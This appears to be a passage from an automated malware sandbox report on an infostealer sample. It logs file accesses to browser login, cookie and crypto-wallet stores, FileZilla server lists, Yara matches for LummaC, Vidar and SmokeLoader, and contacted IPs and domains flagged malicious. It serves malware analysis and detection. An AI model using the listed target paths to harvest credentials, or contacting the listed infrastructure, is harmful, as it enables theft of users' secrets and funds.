Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0D60 sqlite3_bind_parameter_name,	12_2_6D1A0D60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0C40 sqlite3_bind_zeroblob,	12_2_6D1A0C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C8EA0 sqlite3_clear_bindings,	12_2_6D0C8EA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	12_2_6D1A0B40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C6410 bind,WSAGetLastError,	12_2_6D0C6410
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0CC030 sqlite3_bind_parameter_count,	12_2_6D0CC030
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0CC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	12_2_6D0CC050
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C6070 PR_Listen,	12_2_6D0C6070
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C60B0 listen,WSAGetLastError,	12_2_6D0C60B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C63C0 PR_Bind,	12_2_6D0C63C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0522D0 sqlite3_bind_blob,	12_2_6D0522D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C9400 sqlite3_bind_int64,	12_2_6D0C9400

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.145.40.124	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
190.147.128.172	unknown	Colombia	10620	TelmexColombiaSACO	true
109.175.29.39	unknown	Bosnia and Herzegowina	9146	BIHNETBIHNETAutonomusSystemBA	true
104.102.42.29	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
37.27.34.12	unknown	Iran (ISLAMIC Republic Of)	39232	UNINETAZ	false
190.13.174.94	dbfhns.in	Chile	14117	TelefonicadelSurSACL	true
188.114.96.3	whispedwoodmoodsksl.shop	European Union	13335	CLOUDFLARENETUS	true
185.235.137.54	unknown	Iran (ISLAMIC Republic Of)	202391	AFRARASAIR	false
91.202.233.231	unknown	Russian Federation	9009	M247GB	true
45.129.96.86	unknown	Estonia	208440	GMHOST-EE	true

Contacted Domains

Name	IP	Active
whispedwoodmoodsksl.shop	188.114.96.3	true
steamcommunity.com	104.102.42.29	true
